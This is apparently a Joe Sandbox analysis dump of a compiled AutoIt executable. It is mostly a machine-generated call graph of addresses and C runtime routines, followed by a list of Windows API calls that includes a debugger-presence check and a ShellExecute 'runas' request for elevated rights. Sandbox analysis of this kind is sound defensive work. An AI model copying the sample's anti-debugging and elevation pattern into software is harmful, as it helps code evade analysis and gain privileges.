98728->98738 98730 8359b3 98746 838d68 58 API calls __getptd_noexit 98730->98746 98731->98728 98731->98730 98732 835963 98731->98732 98736 8359b1 98731->98736 98745 8335e1 DecodePointer 98731->98745 98732->98731 98742 83a3ab 58 API calls __NMSG_WRITE 98732->98742 98743 83a408 58 API calls 6 library calls 98732->98743 98744 8332df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98732->98744 98747 838d68 58 API calls __getptd_noexit 98736->98747 98738->98715 98739->98715 98740->98719 98741->98721 98742->98732 98743->98732 98745->98731 98746->98736 98747->98738 98748->98725 98749->98738 98751 813d50 __write_nolock 98750->98751 98752 817d2c 59 API calls 98751->98752 98756 813eb6 Mailbox 98751->98756 98754 813d82 98752->98754 98762 813db8 Mailbox 98754->98762 98876 817b52 98754->98876 98755 813e89 98755->98756 98757 817f41 59 API calls 98755->98757 98756->98468 98759 813eaa 98757->98759 98758 817f41 59 API calls 98758->98762 98761 813f84 59 API calls 98759->98761 98760 817b52 59 API calls 98760->98762 98761->98756 98762->98755 98762->98756 98762->98758 98762->98760 98879 813f84 98762->98879 98889 814d13 98764->98889 98769 814f68 LoadLibraryExW 98899 814cc8 98769->98899 98770 84dd0f 98771 814faa 84 API calls 98770->98771 98773 84dd16 98771->98773 98775 814cc8 3 API calls 98773->98775 98777 84dd1e 98775->98777 98925 81506b 98777->98925 98778 814f8f 98778->98777 98779 814f9b 98778->98779 98780 814faa 84 API calls 98779->98780 98782 8137e6 98780->98782 98782->98475 98782->98476 98785 84dd45 98933 815027 98785->98933 98787 84dd52 98789 8181b2 98788->98789 98790 813801 98788->98790 99363 8180d7 98789->99363 98792 8193ea 98790->98792 98793 830ff6 Mailbox 59 API calls 98792->98793 98794 81380d 98793->98794 98794->98489 98796 81862b 98795->98796 98798 818652 98796->98798 99367 818b13 69 API calls Mailbox 98796->99367 98798->98492 98800 813f05 98799->98800 98801 813eec 98799->98801 98803 817d2c 59 API calls 98800->98803 98802 8181a7 59 API calls 98801->98802 
98804 81388b 98802->98804 98803->98804 98805 83313d 98804->98805 98806 8331be 98805->98806 98807 833149 98805->98807 99370 8331d0 60 API calls 3 library calls 98806->99370 98814 83316e 98807->98814 99368 838d68 58 API calls __getptd_noexit 98807->99368 98810 8331cb 98810->98514 98811 833155 99369 838ff6 9 API calls __wfsopen 98811->99369 98813 833160 98813->98514 98814->98514 98816 819436 98815->98816 98817 830ff6 Mailbox 59 API calls 98816->98817 98818 819444 98817->98818 98819 813936 98818->98819 99371 81935c 59 API calls Mailbox 98818->99371 98821 8191b0 98819->98821 99372 8192c0 98821->99372 98823 830ff6 Mailbox 59 API calls 98824 813944 98823->98824 98826 819040 98824->98826 98825 8191bf 98825->98823 98825->98824 98827 84f5a5 98826->98827 98829 819057 98826->98829 98827->98829 99387 818d3b 59 API calls Mailbox 98827->99387 98830 8191a0 98829->98830 98831 819158 98829->98831 98834 81915f 98829->98834 99386 819e9c 60 API calls Mailbox 98830->99386 98833 830ff6 Mailbox 59 API calls 98831->98833 98833->98834 98834->98542 98836 815045 85 API calls 98835->98836 98837 879854 98836->98837 99388 8799be 98837->99388 98840 81506b 74 API calls 98841 879881 98840->98841 98842 81506b 74 API calls 98841->98842 98843 879891 98842->98843 98844 81506b 74 API calls 98843->98844 98845 8798ac 98844->98845 98846 81506b 74 API calls 98845->98846 98847 8798c7 98846->98847 98848 815045 85 API calls 98847->98848 98849 8798de 98848->98849 98850 83594c __crtCompareStringA_stat 58 API calls 98849->98850 98851 8798e5 98850->98851 98852 83594c __crtCompareStringA_stat 58 API calls 98851->98852 98853 8798ef 98852->98853 98854 81506b 74 API calls 98853->98854 98855 879903 98854->98855 98856 879393 GetSystemTimeAsFileTime 98855->98856 98857 879916 98856->98857 98858 879940 98857->98858 98859 87992b 98857->98859 98861 879946 98858->98861 98862 8799a5 98858->98862 98860 832f95 _free 58 API calls 98859->98860 98864 879931 98860->98864 99394 878d90 98861->99394 98863 832f95 _free 58 API calls 
98862->98863 98866 84d3c1 98863->98866 98867 832f95 _free 58 API calls 98864->98867 98866->98479 98870 814faa 98866->98870 98867->98866 98869 832f95 _free 58 API calls 98869->98866 98871 814fb4 98870->98871 98872 814fbb 98870->98872 98873 8355d6 __fcloseall 83 API calls 98871->98873 98874 814fdb FreeLibrary 98872->98874 98875 814fca 98872->98875 98873->98872 98874->98875 98875->98479 98885 817faf 98876->98885 98878 817b5d 98878->98754 98880 813f92 98879->98880 98884 813fb4 _memmove 98879->98884 98882 830ff6 Mailbox 59 API calls 98880->98882 98881 830ff6 Mailbox 59 API calls 98883 813fc8 98881->98883 98882->98884 98883->98762 98884->98881 98886 817fc2 98885->98886 98888 817fbf _memmove 98885->98888 98887 830ff6 Mailbox 59 API calls 98886->98887 98887->98888 98888->98878 98938 814d61 98889->98938 98892 814d3a 98894 814d53 98892->98894 98895 814d4a FreeLibrary 98892->98895 98893 814d61 2 API calls 98893->98892 98896 83548b 98894->98896 98895->98894 98942 8354a0 98896->98942 98898 814f5c 98898->98769 98898->98770 99100 814d94 98899->99100 98902 814ced 98903 814d08 98902->98903 98904 814cff FreeLibrary 98902->98904 98906 814dd0 98903->98906 98904->98903 98905 814d94 2 API calls 98905->98902 98907 830ff6 Mailbox 59 API calls 98906->98907 98908 814de5 98907->98908 99104 81538e 98908->99104 98910 814df1 _memmove 98911 814e2c 98910->98911 98912 814f21 98910->98912 98913 814ee9 98910->98913 98914 815027 69 API calls 98911->98914 99118 879ba5 95 API calls 98912->99118 99107 814fe9 CreateStreamOnHGlobal 98913->99107 98920 814e35 98914->98920 98917 81506b 74 API calls 98917->98920 98918 814ec9 98918->98778 98920->98917 98920->98918 98921 84dcd0 98920->98921 99113 815045 98920->99113 98922 815045 85 API calls 98921->98922 98923 84dce4 98922->98923 98924 81506b 74 API calls 98923->98924 98924->98918 98926 84ddf6 98925->98926 98927 81507d 98925->98927 99142 835812 98927->99142 98930 879393 99340 8791e9 98930->99340 98932 8793a9 98932->98785 98934 815036 98933->98934 98935 84ddb9 
98933->98935 99345 835e90 98934->99345 98937 81503e 98937->98787 98939 814d2e 98938->98939 98940 814d6a LoadLibraryA 98938->98940 98939->98892 98939->98893 98940->98939 98941 814d7b GetProcAddress 98940->98941 98941->98939 98945 8354ac __wfsopen 98942->98945 98943 8354bf 98991 838d68 58 API calls __getptd_noexit 98943->98991 98945->98943 98947 8354f0 98945->98947 98946 8354c4 98992 838ff6 9 API calls __wfsopen 98946->98992 98961 840738 98947->98961 98950 8354f5 98951 83550b 98950->98951 98952 8354fe 98950->98952 98954 835535 98951->98954 98955 835515 98951->98955 98993 838d68 58 API calls __getptd_noexit 98952->98993 98976 840857 98954->98976 98994 838d68 58 API calls __getptd_noexit 98955->98994 98957 8354cf __wfsopen @_EH4_CallFilterFunc@8 98957->98898 98962 840744 __wfsopen 98961->98962 98963 839e4b __lock 58 API calls 98962->98963 98974 840752 98963->98974 98964 8407c6 98996 84084e 98964->98996 98965 8407cd 99001 838a5d 58 API calls 2 library calls 98965->99001 98968 8407d4 98968->98964 99002 83a06b InitializeCriticalSectionAndSpinCount 98968->99002 98969 840843 __wfsopen 98969->98950 98971 839ed3 __mtinitlocknum 58 API calls 98971->98974 98973 8407fa EnterCriticalSection 98973->98964 98974->98964 98974->98965 98974->98971 98999 836e8d 59 API calls __lock 98974->98999 99000 836ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98974->99000 98984 840877 __wopenfile 98976->98984 98977 840891 99007 838d68 58 API calls __getptd_noexit 98977->99007 98979 840896 99008 838ff6 9 API calls __wfsopen 98979->99008 98981 835540 98995 835562 LeaveCriticalSection LeaveCriticalSection _fseek 98981->98995 98982 840aaf 99004 8487f1 98982->99004 98984->98977 98984->98984 98990 840a4c 98984->98990 99009 833a0b 60 API calls 2 library calls 98984->99009 98986 840a45 98986->98990 99010 833a0b 60 API calls 2 library calls 98986->99010 98988 840a64 98988->98990 99011 833a0b 60 API calls 2 library calls 98988->99011 98990->98977 98990->98982 98991->98946 98992->98957 98993->98957 
98994->98957 98995->98957 99003 839fb5 LeaveCriticalSection 98996->99003 98998 840855 98998->98969 98999->98974 99000->98974 99001->98968 99002->98973 99003->98998 99012 847fd5 99004->99012 99006 84880a 99006->98981 99007->98979 99008->98981 99009->98986 99010->98988 99011->98990 99015 847fe1 __wfsopen 99012->99015 99013 847ff7 99097 838d68 58 API calls __getptd_noexit 99013->99097 99015->99013 99017 84802d 99015->99017 99016 847ffc 99098 838ff6 9 API calls __wfsopen 99016->99098 99023 84809e 99017->99023 99020 848049 99099 848072 LeaveCriticalSection __unlock_fhandle 99020->99099 99022 848006 __wfsopen 99022->99006 99024 8480be 99023->99024 99025 83471a __wsopen_nolock 58 API calls 99024->99025 99027 8480da 99025->99027 99026 839006 __invoke_watson 8 API calls 99028 8487f0 99026->99028 99029 848114 99027->99029 99036 848137 99027->99036 99071 848211 99027->99071 99030 847fd5 __wsopen_helper 103 API calls 99028->99030 99031 838d34 __lseeki64 58 API calls 99029->99031 99032 84880a 99030->99032 99033 848119 99031->99033 99032->99020 99034 838d68 __wfsopen 58 API calls 99033->99034 99035 848126 99034->99035 99038 838ff6 __wfsopen 9 API calls 99035->99038 99037 8481f5 99036->99037 99045 8481d3 99036->99045 99039 838d34 __lseeki64 58 API calls 99037->99039 99040 848130 99038->99040 99041 8481fa 99039->99041 99040->99020 99042 838d68 __wfsopen 58 API calls 99041->99042 99043 848207 99042->99043 99044 838ff6 __wfsopen 9 API calls 99043->99044 99044->99071 99046 83d4d4 __alloc_osfhnd 61 API calls 99045->99046 99047 8482a1 99046->99047 99048 8482ce 99047->99048 99049 8482ab 99047->99049 99051 847f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99048->99051 99050 838d34 __lseeki64 58 API calls 99049->99050 99052 8482b0 99050->99052 99062 8482f0 99051->99062 99053 838d68 __wfsopen 58 API calls 99052->99053 99055 8482ba 99053->99055 99054 84836e GetFileType 99056 848379 GetLastError 99054->99056 99057 8483bb 99054->99057 99060 838d68 __wfsopen 58 API calls 
99055->99060 99061 838d47 __dosmaperr 58 API calls 99056->99061 99067 83d76a __set_osfhnd 59 API calls 99057->99067 99058 84833c GetLastError 99059 838d47 __dosmaperr 58 API calls 99058->99059 99063 848361 99059->99063 99060->99040 99064 8483a0 CloseHandle 99061->99064 99062->99054 99062->99058 99065 847f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99062->99065 99069 838d68 __wfsopen 58 API calls 99063->99069 99064->99063 99068 8483ae 99064->99068 99066 848331 99065->99066 99066->99054 99066->99058 99073 8483d9 99067->99073 99070 838d68 __wfsopen 58 API calls 99068->99070 99069->99071 99072 8483b3 99070->99072 99071->99026 99072->99063 99074 848594 99073->99074 99075 841b11 __lseeki64_nolock 60 API calls 99073->99075 99093 84845a 99073->99093 99074->99071 99076 848767 CloseHandle 99074->99076 99077 848443 99075->99077 99078 847f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99076->99078 99080 838d34 __lseeki64 58 API calls 99077->99080 99077->99093 99079 84878e 99078->99079 99081 848796 GetLastError 99079->99081 99082 8487c2 99079->99082 99080->99093 99083 838d47 __dosmaperr 58 API calls 99081->99083 99082->99071 99085 8487a2 99083->99085 99084 84848c 99088 8499f2 __chsize_nolock 82 API calls 99084->99088 99084->99093 99089 83d67d __free_osfhnd 59 API calls 99085->99089 99086 8410ab 70 API calls __read_nolock 99086->99093 99087 840d2d __close_nolock 61 API calls 99087->99093 99088->99084 99089->99082 99090 83dac6 __write 78 API calls 99090->99093 99091 848611 99092 840d2d __close_nolock 61 API calls 99091->99092 99094 848618 99092->99094 99093->99074 99093->99084 99093->99086 99093->99087 99093->99090 99093->99091 99095 841b11 60 API calls __lseeki64_nolock 99093->99095 99096 838d68 __wfsopen 58 API calls 99094->99096 99095->99093 99096->99071 99097->99016 99098->99022 99099->99022 99101 814ce1 99100->99101 99102 814d9d LoadLibraryA 99100->99102 99101->98902 99101->98905 99102->99101 99103 814dae GetProcAddress 99102->99103 
99103->99101 99105 830ff6 Mailbox 59 API calls 99104->99105 99106 8153a0 99105->99106 99106->98910 99108 815020 99107->99108 99109 815003 FindResourceExW 99107->99109 99108->98911 99109->99108 99110 84dd5c LoadResource 99109->99110 99110->99108 99111 84dd71 SizeofResource 99110->99111 99111->99108 99112 84dd85 LockResource 99111->99112 99112->99108 99114 84ddd4 99113->99114 99115 815054 99113->99115 99119 835a7d 99115->99119 99117 815062 99117->98920 99118->98911 99120 835a89 __wfsopen 99119->99120 99121 835a9b 99120->99121 99123 835ac1 99120->99123 99132 838d68 58 API calls __getptd_noexit 99121->99132 99134 836e4e 99123->99134 99125 835aa0 99133 838ff6 9 API calls __wfsopen 99125->99133 99126 835ac7 99140 8359ee 83 API calls 5 library calls 99126->99140 99129 835ad6 99141 835af8 LeaveCriticalSection LeaveCriticalSection _fseek 99129->99141 99131 835aab __wfsopen 99131->99117 99132->99125 99133->99131 99135 836e80 EnterCriticalSection 99134->99135 99136 836e5e 99134->99136 99138 836e76 99135->99138 99136->99135 99137 836e66 99136->99137 99139 839e4b __lock 58 API calls 99137->99139 99138->99126 99139->99138 99140->99129 99141->99131 99145 83582d 99142->99145 99144 81508e 99144->98930 99146 835839 __wfsopen 99145->99146 99147 83584f _memset 99146->99147 99148 83587c 99146->99148 99150 835874 __wfsopen 99146->99150 99172 838d68 58 API calls __getptd_noexit 99147->99172 99149 836e4e __lock_file 59 API calls 99148->99149 99151 835882 99149->99151 99150->99144 99158 83564d 99151->99158 99154 835869 99173 838ff6 9 API calls __wfsopen 99154->99173 99161 835668 _memset 99158->99161 99171 835683 99158->99171 99159 835673 99270 838d68 58 API calls __getptd_noexit 99159->99270 99161->99159 99168 8356c3 99161->99168 99161->99171 99162 835678 99271 838ff6 9 API calls __wfsopen 99162->99271 99165 8357d4 _memset 99273 838d68 58 API calls __getptd_noexit 99165->99273 99168->99165 99168->99171 99175 834916 99168->99175 99182 8410ab 99168->99182 99250 840df7 99168->99250 99272 
840f18 58 API calls 3 library calls 99168->99272 99174 8358b6 LeaveCriticalSection LeaveCriticalSection _fseek 99171->99174 99172->99154 99173->99150 99174->99150 99176 834920 99175->99176 99177 834935 99175->99177 99274 838d68 58 API calls __getptd_noexit 99176->99274 99177->99168 99179 834925 99275 838ff6 9 API calls __wfsopen 99179->99275 99181 834930 99181->99168 99183 8410e3 99182->99183 99184 8410cc 99182->99184 99186 84181b 99183->99186 99190 84111d 99183->99190 99285 838d34 58 API calls __getptd_noexit 99184->99285 99301 838d34 58 API calls __getptd_noexit 99186->99301 99187 8410d1 99286 838d68 58 API calls __getptd_noexit 99187->99286 99192 841125 99190->99192 99199 84113c 99190->99199 99191 841820 99302 838d68 58 API calls __getptd_noexit 99191->99302 99287 838d34 58 API calls __getptd_noexit 99192->99287 99195 841131 99303 838ff6 9 API calls __wfsopen 99195->99303 99196 84112a 99288 838d68 58 API calls __getptd_noexit 99196->99288 99198 841151 99289 838d34 58 API calls __getptd_noexit 99198->99289 99199->99198 99201 84116b 99199->99201 99203 841189 99199->99203 99230 8410d8 99199->99230 99201->99198 99206 841176 99201->99206 99290 838a5d 58 API calls 2 library calls 99203->99290 99276 845ebb 99206->99276 99207 841199 99208 8411a1 99207->99208 99209 8411bc 99207->99209 99291 838d68 58 API calls __getptd_noexit 99208->99291 99293 841b11 60 API calls 3 library calls 99209->99293 99210 84128a 99212 841303 ReadFile 99210->99212 99217 8412a0 GetConsoleMode 99210->99217 99215 841325 99212->99215 99216 8417e3 GetLastError 99212->99216 99214 8411a6 99292 838d34 58 API calls __getptd_noexit 99214->99292 99215->99216 99223 8412f5 99215->99223 99219 8412e3 99216->99219 99220 8417f0 99216->99220 99221 8412b4 99217->99221 99222 841300 99217->99222 99231 8412e9 99219->99231 99294 838d47 58 API calls 3 library calls 99219->99294 99299 838d68 58 API calls __getptd_noexit 99220->99299 99221->99222 99225 8412ba ReadConsoleW 99221->99225 99222->99212 99223->99231 99233 
8415c7 99223->99233 99236 84135a 99223->99236 99225->99223 99227 8412dd GetLastError 99225->99227 99226 8417f5 99300 838d34 58 API calls __getptd_noexit 99226->99300 99227->99219 99230->99168 99231->99230 99232 832f95 _free 58 API calls 99231->99232 99232->99230 99233->99231 99240 8416cd ReadFile 99233->99240 99234 8413c6 ReadFile 99237 8413e7 GetLastError 99234->99237 99249 8413f1 99234->99249 99236->99234 99241 841447 99236->99241 99237->99249 99238 841504 99244 8414b4 MultiByteToWideChar 99238->99244 99297 841b11 60 API calls 3 library calls 99238->99297 99239 8414f4 99296 838d68 58 API calls __getptd_noexit 99239->99296 99243 8416f0 GetLastError 99240->99243 99247 8416fe 99240->99247 99241->99231 99241->99238 99241->99239 99241->99244 99243->99247 99244->99227 99244->99231 99247->99233 99298 841b11 60 API calls 3 library calls 99247->99298 99249->99236 99295 841b11 60 API calls 3 library calls 99249->99295 99251 840e02 99250->99251 99256 840e17 99250->99256 99337 838d68 58 API calls __getptd_noexit 99251->99337 99253 840e12 99253->99168 99254 840e07 99338 838ff6 9 API calls __wfsopen 99254->99338 99256->99253 99257 840e4c 99256->99257 99339 846234 58 API calls __malloc_crt 99256->99339 99259 834916 __fflush_nolock 58 API calls 99257->99259 99260 840e60 99259->99260 99304 840f97 99260->99304 99262 840e67 99262->99253 99263 834916 __fflush_nolock 58 API calls 99262->99263 99264 840e8a 99263->99264 99264->99253 99265 834916 __fflush_nolock 58 API calls 99264->99265 99266 840e96 99265->99266 99266->99253 99267 834916 __fflush_nolock 58 API calls 99266->99267 99268 840ea3 99267->99268 99269 834916 __fflush_nolock 58 API calls 99268->99269 99269->99253 99270->99162 99271->99171 99272->99168 99273->99162 99274->99179 99275->99181 99277 845ec6 99276->99277 99278 845ed3 99276->99278 99279 838d68 __wfsopen 58 API calls 99277->99279 99281 845edf 99278->99281 99282 838d68 __wfsopen 58 API calls 99278->99282 99280 845ecb 99279->99280 99280->99210 99281->99210 99283 845f00 
99282->99283 99284 838ff6 __wfsopen 9 API calls 99283->99284 99284->99280 99285->99187 99286->99230 99287->99196 99288->99195 99289->99196 99290->99207 99291->99214 99292->99230 99293->99206 99294->99231 99295->99249 99296->99231 99297->99244 99298->99247 99299->99226 99300->99231 99301->99191 99302->99195 99303->99230 99305 840fa3 __wfsopen 99304->99305 99306 840fc7 99305->99306 99307 840fb0 99305->99307 99309 84108b 99306->99309 99312 840fdb 99306->99312 99308 838d34 __lseeki64 58 API calls 99307->99308 99311 840fb5 99308->99311 99310 838d34 __lseeki64 58 API calls 99309->99310 99313 840ffe 99310->99313 99314 838d68 __wfsopen 58 API calls 99311->99314 99315 841006 99312->99315 99316 840ff9 99312->99316 99322 838d68 __wfsopen 58 API calls 99313->99322 99317 840fbc __wfsopen 99314->99317 99319 841013 99315->99319 99320 841028 99315->99320 99318 838d34 __lseeki64 58 API calls 99316->99318 99317->99262 99318->99313 99323 838d34 __lseeki64 58 API calls 99319->99323 99321 83d446 ___lock_fhandle 59 API calls 99320->99321 99325 84102e 99321->99325 99329 841020 99322->99329 99324 841018 99323->99324 99326 838d68 __wfsopen 58 API calls 99324->99326 99327 841054 99325->99327 99328 841041 99325->99328 99326->99329 99332 838d68 __wfsopen 58 API calls 99327->99332 99330 8410ab __read_nolock 70 API calls 99328->99330 99331 838ff6 __wfsopen 9 API calls 99329->99331 99333 84104d 99330->99333 99331->99317 99334 841059 99332->99334 99336 841083 __read LeaveCriticalSection 99333->99336 99335 838d34 __lseeki64 58 API calls 99334->99335 99335->99333 99336->99317 99337->99254 99338->99253 99339->99257 99343 83543a GetSystemTimeAsFileTime 99340->99343 99342 8791f8 99342->98932 99344 835468 __aulldiv 99343->99344 99344->99342 99346 835e9c __wfsopen 99345->99346 99347 835ec3 99346->99347 99348 835eae 99346->99348 99349 836e4e __lock_file 59 API calls 99347->99349 99359 838d68 58 API calls __getptd_noexit 99348->99359 99352 835ec9 99349->99352 99351 835eb3 99360 838ff6 9 API calls 
__wfsopen 99351->99360 99361 835b00 67 API calls 6 library calls 99352->99361 99355 835ebe __wfsopen 99355->98937 99356 835ed4 99362 835ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99356->99362 99358 835ee6 99358->99355 99359->99351 99360->99355 99361->99356 99362->99358 99365 8180e7 99363->99365 99366 8180fa _memmove 99363->99366 99364 830ff6 Mailbox 59 API calls 99364->99366 99365->99364 99365->99366 99366->98790 99367->98798 99368->98811 99369->98813 99370->98810 99371->98819 99373 8192c9 Mailbox 99372->99373 99374 84f5c8 99373->99374 99379 8192d3 99373->99379 99376 830ff6 Mailbox 59 API calls 99374->99376 99375 8192da 99375->98825 99377 84f5d4 99376->99377 99379->99375 99380 819df0 99379->99380 99382 819dfb 99380->99382 99381 819e32 99381->99379 99382->99381 99385 818e34 59 API calls Mailbox 99382->99385 99384 819e5d 99384->99379 99385->99384 99386->98834 99387->98829 99393 8799d2 __tzset_nolock _wcscmp 99388->99393 99389 81506b 74 API calls 99389->99393 99390 879866 99390->98840 99390->98866 99391 879393 GetSystemTimeAsFileTime 99391->99393 99392 815045 85 API calls 99392->99393 99393->99389 99393->99390 99393->99391 99393->99392 99395 878d9b 99394->99395 99396 878da9 99394->99396 99397 83548b 115 API calls 99395->99397 99398 878dee 99396->99398 99399 83548b 115 API calls 99396->99399 99420 878db2 99396->99420 99397->99396 99425 87901b 99398->99425 99401 878dd3 99399->99401 99401->99398 99403 878ddc 99401->99403 99402 878e32 99404 878e57 99402->99404 99405 878e36 99402->99405 99408 8355d6 __fcloseall 83 API calls 99403->99408 99403->99420 99429 878c33 99404->99429 99407 878e43 99405->99407 99410 8355d6 __fcloseall 83 API calls 99405->99410 99413 8355d6 __fcloseall 83 API calls 99407->99413 99407->99420 99408->99420 99410->99407 99411 878e85 99438 878eb5 99411->99438 99412 878e65 99414 878e72 99412->99414 99416 8355d6 __fcloseall 83 API calls 99412->99416 99413->99420 99418 8355d6 __fcloseall 83 API calls 99414->99418 99414->99420 99416->99414 
99418->99420 99420->98869 99422 878ea0 99422->99420 99424 8355d6 __fcloseall 83 API calls 99422->99424 99424->99420 99426 879040 99425->99426 99428 879029 __tzset_nolock _memmove 99425->99428 99427 835812 __fread_nolock 74 API calls 99426->99427 99427->99428 99428->99402 99430 83594c __crtCompareStringA_stat 58 API calls 99429->99430 99431 878c42 99430->99431 99432 83594c __crtCompareStringA_stat 58 API calls 99431->99432 99433 878c56 99432->99433 99434 83594c __crtCompareStringA_stat 58 API calls 99433->99434 99435 878c6a 99434->99435 99436 878f97 58 API calls 99435->99436 99437 878c7d 99435->99437 99436->99437 99437->99411 99437->99412 99445 878eca 99438->99445 99439 878f82 99467 8791bf 99439->99467 99441 878c8f 74 API calls 99441->99445 99442 878e8c 99446 878f97 99442->99446 99445->99439 99445->99441 99445->99442 99471 878d2b 74 API calls 99445->99471 99472 87909c 80 API calls 99445->99472 99447 878fa4 99446->99447 99448 878faa 99446->99448 99449 832f95 _free 58 API calls 99447->99449 99450 878fbb 99448->99450 99451 832f95 _free 58 API calls 99448->99451 99449->99448 99452 832f95 _free 58 API calls 99450->99452 99453 878e93 99450->99453 99451->99450 99452->99453 99453->99422 99454 8355d6 99453->99454 99455 8355e2 __wfsopen 99454->99455 99456 8355f6 99455->99456 99457 83560e 99455->99457 99554 838d68 58 API calls __getptd_noexit 99456->99554 99459 836e4e __lock_file 59 API calls 99457->99459 99463 835606 __wfsopen 99457->99463 99461 835620 99459->99461 99460 8355fb 99555 838ff6 9 API calls __wfsopen 99460->99555 99538 83556a 99461->99538 99463->99422 99468 8791dd 99467->99468 99469 8791cc 99467->99469 99468->99442 99473 834a93 99469->99473 99471->99445 99472->99445 99474 834a9f __wfsopen 99473->99474 99475 834ad5 99474->99475 99476 834abd 99474->99476 99477 834acd __wfsopen 99474->99477 99478 836e4e __lock_file 59 API calls 99475->99478 99498 838d68 58 API calls __getptd_noexit 99476->99498 99477->99468 99480 834adb 99478->99480 99486 83493a 99480->99486 99481 
834ac2 99499 838ff6 9 API calls __wfsopen 99481->99499 99488 834949 99486->99488 99494 834967 99486->99494 99487 834957 99529 838d68 58 API calls __getptd_noexit 99487->99529 99488->99487 99492 834981 _memmove 99488->99492 99488->99494 99490 83495c 99530 838ff6 9 API calls __wfsopen 99490->99530 99492->99494 99496 834916 __fflush_nolock 58 API calls 99492->99496 99501 83dac6 99492->99501 99531 834c6d 99492->99531 99537 83b05e 78 API calls 6 library calls 99492->99537 99500 834b0d LeaveCriticalSection LeaveCriticalSection _fseek 99494->99500 99496->99492 99498->99481 99499->99477 99500->99477 99502 83dad2 __wfsopen 99501->99502 99503 83daf6 99502->99503 99504 83dadf 99502->99504 99506 83db95 99503->99506 99508 83db0a 99503->99508 99505 838d34 __lseeki64 58 API calls 99504->99505 99507 83dae4 99505->99507 99509 838d34 __lseeki64 58 API calls 99506->99509 99510 838d68 __wfsopen 58 API calls 99507->99510 99511 83db32 99508->99511 99512 83db28 99508->99512 99513 83db2d 99509->99513 99521 83daeb __wfsopen 99510->99521 99515 83d446 ___lock_fhandle 59 API calls 99511->99515 99514 838d34 __lseeki64 58 API calls 99512->99514 99517 838d68 __wfsopen 58 API calls 99513->99517 99514->99513 99516 83db38 99515->99516 99518 83db4b 99516->99518 99519 83db5e 99516->99519 99520 83dba1 99517->99520 99523 83dbb5 __write_nolock 76 API calls 99518->99523 99522 838d68 __wfsopen 58 API calls 99519->99522 99524 838ff6 __wfsopen 9 API calls 99520->99524 99521->99492 99525 83db63 99522->99525 99526 83db57 99523->99526 99524->99521 99527 838d34 __lseeki64 58 API calls 99525->99527 99528 83db8d __write LeaveCriticalSection 99526->99528 99527->99526 99528->99521 99529->99490 99530->99494 99532 834c80 99531->99532 99536 834ca4 99531->99536 99533 834916 __fflush_nolock 58 API calls 99532->99533 99532->99536 99534 834c9d 99533->99534 99535 83dac6 __write 78 API calls 99534->99535 99535->99536 99536->99492 99537->99492 99539 835579 99538->99539 99540 83558d 99538->99540 99587 838d68 58 API calls 
                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00813B7A
                                                            • IsDebuggerPresent.KERNEL32 ref: 00813B8C
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,008D62F8,008D62E0,?,?), ref: 00813BFD
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                              • Part of subcall function 00820A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00813C26,008D62F8,?,?,?), ref: 00820ACE
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00813C81
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008C93F0,00000010), ref: 0084D4BC
                                                            • SetCurrentDirectoryW.KERNEL32(?,008D62F8,?,?,?), ref: 0084D4F4
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008C5D40,008D62F8,?,?,?), ref: 0084D57A
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0084D581
                                                              • Part of subcall function 00813A58: GetSysColorBrush.USER32(0000000F), ref: 00813A62
                                                              • Part of subcall function 00813A58: LoadCursorW.USER32(00000000,00007F00), ref: 00813A71
                                                              • Part of subcall function 00813A58: LoadIconW.USER32(00000063), ref: 00813A88
                                                              • Part of subcall function 00813A58: LoadIconW.USER32(000000A4), ref: 00813A9A
                                                              • Part of subcall function 00813A58: LoadIconW.USER32(000000A2), ref: 00813AAC
                                                              • Part of subcall function 00813A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00813AD2
                                                              • Part of subcall function 00813A58: RegisterClassExW.USER32(?), ref: 00813B28
                                                              • Part of subcall function 008139E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00813A15
                                                              • Part of subcall function 008139E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00813A36
                                                              • Part of subcall function 008139E7: ShowWindow.USER32(00000000,?,?), ref: 00813A4A
                                                              • Part of subcall function 008139E7: ShowWindow.USER32(00000000,?,?), ref: 00813A53
                                                              • Part of subcall function 008143DB: _memset.LIBCMT ref: 00814401
                                                              • Part of subcall function 008143DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008144A6
                                                            Strings
                                                            • This is a third-party compiled AutoIt script., xrefs: 0084D4B4
                                                            • runas, xrefs: 0084D575
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 529118366-3287110873
                                                            • Opcode ID: afb8bd5dc4ed1d53f18a81a63ba3443d7a58be894f8779ab1d268d7b5ffdd954
